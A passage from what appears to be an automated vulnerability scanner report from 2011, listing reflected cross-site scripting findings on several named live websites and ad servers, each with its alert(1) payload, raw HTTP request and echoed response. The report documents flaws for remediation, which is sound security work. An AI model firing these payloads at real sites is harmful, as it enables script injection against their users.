GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F267a4"%3balert(1)//ec0110e87b HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:53 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=8EF5AF1534C8D16594D2F61F4FAA440D; Path=/ Content-Length: 2235 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:53 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 646be'%3balert(1)//7deaafb62b9 was submitted in the admeld_adprovider_id parameter. This input was echoed as 646be';alert(1)//7deaafb62b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492646be'%3balert(1)//7deaafb62b9&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: um.adpredictive.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac9c7'%3balert(1)//432447c0514 was submitted in the admeld_callback parameter. This input was echoed as ac9c7';alert(1)//432447c0514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac9c7'%3balert(1)//432447c0514 HTTP/1.1 Host: um.adpredictive.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92343"-alert(1)-"ebb68879ffc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php92343"-alert(1)-"ebb68879ffc HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 15:52:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=if2gvf5uvdh7v1a1320leacm11; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1497 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php92343"-alert(1)-"ebb68879ffc"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7efed<script>alert(1)</script>ee0d16265bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php7efed<script>alert(1)</script>ee0d16265bf HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 15:52:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=cs8kb2m53v021g3mbm8btac024; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1523 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php7efed<script>alert(1)</script>ee0d16265bf</strong> ...[SNIP]...
4.113. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19497"-alert(1)-"fe14a7cf82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/19497"-alert(1)-"fe14a7cf82e HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/19497"-alert(1)-"fe14a7cf82e"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29706"style%3d"x%3aexpression(alert(1))"3fa85094d5c was submitted in the v parameter. This input was echoed as 29706"style="x:expression(alert(1))"3fa85094d5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=2029706"style%3d"x%3aexpression(alert(1))"3fa85094d5c HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:47 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-2029706"style="x:expression(alert(1))"3fa85094d5c" /> ...[SNIP]...
4.115. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.brinked.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35421"><script>alert(1)</script>01d4208af54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?35421"><script>alert(1)</script>01d4208af54=1 HTTP/1.1 Host: www.brinked.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <input type="hidden" name="url" value="../?35421"><script>alert(1)</script>01d4208af54=1" /> ...[SNIP]...
4.116. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.brinked.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0e8d</script><script>alert(1)</script>164da3fbd1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f0e8d</script><script>alert(1)</script>164da3fbd1b=1 HTTP/1.1 Host: www.brinked.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f2f"><script>alert(1)</script>42a734dfe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsd4f2f"><script>alert(1)</script>42a734dfe42/software/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=SOVVIITHY30MLQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32887
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsd4f2f"><script>alert(1)</script>42a734dfe42/software/h;kvarticleid=;kvauthor=;loc=300;grp=285504902" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf881'-alert(1)-'c7d0e430718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=E5L45LDGRZA11QE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32837
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=945734015;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6465'-alert(1)-'291f947bd70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=RD2TG501O4YWPQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32358
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=389734246;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab8a"><script>alert(1)</script>b614631af52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/softwaredab8a"><script>alert(1)</script>b614631af52/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=J03AGR31Q5PQNQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32408
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaredab8a"><script>alert(1)</script>b614631af52/h;kvarticleid=;kvauthor=;loc=300;grp=731813626" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dc63'-alert(1)-'4490bf86c41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=VBUYZEOB41MHPQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32813
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=173128278;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0b8"><a%20b%3dc>325da676732 was submitted in the REST URL parameter 3. This input was echoed as cc0b8"><a b=c>325da676732 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/software/hostedcc0b8"><a%20b%3dc>325da676732/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=4DWIFQDDRQC2LQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32815
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hostedcc0b8"><a b=c>325da676732/showArticle;kvarticleid=;kvauthor=;loc=300;grp=695609622" target="_blank"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6576"><script>alert(1)</script>cebc826cf51 was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51&subSection=Hosted+Software HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=AO4VIN1V3MUUNQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 34103
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fbfd'%3balert(1)//94414a05705 was submitted in the articleID parameter. This input was echoed as 6fbfd';alert(1)//94414a05705 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=2257005736fbfd'%3balert(1)//94414a05705&subSection=Hosted+Software HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=WB0PTHRLAGQ1PQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33678
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=2257005736fbfd';alert(1)//94414a05705+/news/software/hosted/showArticle/dhandler;kvarticleid=2257005736fbfd';alert(1)//94414a05705;kvauthor=;loc=100;target=_blank;grp=919541144;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1a16<a>c35b1c1308c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sat, 05 Feb 2011 16:11:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e07"><a>827f9aea977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-c0xFC9HiPwWw-70e07"><a>827f9aea977 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sat, 05 Feb 2011 16:11:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.127. http://www.rackspace.com/blog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df87"><script>alert(1)</script>8c3dc7536d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df87\"><script>alert(1)</script>8c3dc7536d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
